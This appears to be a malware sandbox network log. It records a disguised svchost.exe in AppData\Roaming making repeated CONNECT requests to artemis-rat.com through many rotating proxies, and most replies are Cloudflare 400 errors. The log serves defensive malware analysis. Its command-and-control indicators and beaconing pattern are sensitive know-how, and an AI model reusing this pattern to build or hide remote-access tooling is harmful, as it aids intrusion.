                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.372015953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3327192.168.2.560671104.20.235.1798043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.373075962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.530297041 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3328192.168.2.560694104.16.107.1428043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.384982109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.543920994 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3329192.168.2.560700104.27.12.228043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.386257887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.543942928 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3330192.168.2.560107197.242.146.109312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.389921904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.333405972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.833746910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3331192.168.2.560704172.67.182.908043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.389925003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.547389984 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3332192.168.2.560737104.20.75.698043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.421868086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.576193094 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3333192.168.2.560743172.67.127.1888043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.436256886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.591777086 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3334192.168.2.56064372.206.181.976494343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.437062025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3335192.168.2.560620164.92.237.1885230643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.437077045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.146033049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.146564007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3336192.168.2.55596592.205.110.471493643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.451492071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3337192.168.2.555888197.243.20.1878043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.460863113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.645610094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3338192.168.2.56071538.54.6.39908043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.460865021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.680228949 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3339192.168.2.555850103.42.57.13312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.620210886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.677273035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3340192.168.2.560656200.10.73.210567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.620336056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3341192.168.2.560777104.18.44.938043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.622672081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.778801918 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3342192.168.2.555860103.81.220.33808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.623204947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.677381039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3343192.168.2.560154138.36.150.16108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.625386953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.146047115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3344192.168.2.560701185.212.60.628043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.630872011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3345192.168.2.555925119.3.215.41888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.630877018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3346192.168.2.560779172.67.181.1038043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.630985022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.786951065 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3347192.168.2.56068982.65.240.111312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.632308960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.333458900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.333681107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3348192.168.2.560215162.241.46.66259243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.633330107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3349192.168.2.56071864.137.93.62651943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.635720968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.925187111 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3350192.168.2.560813104.16.72.458043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.639539003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.795479059 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
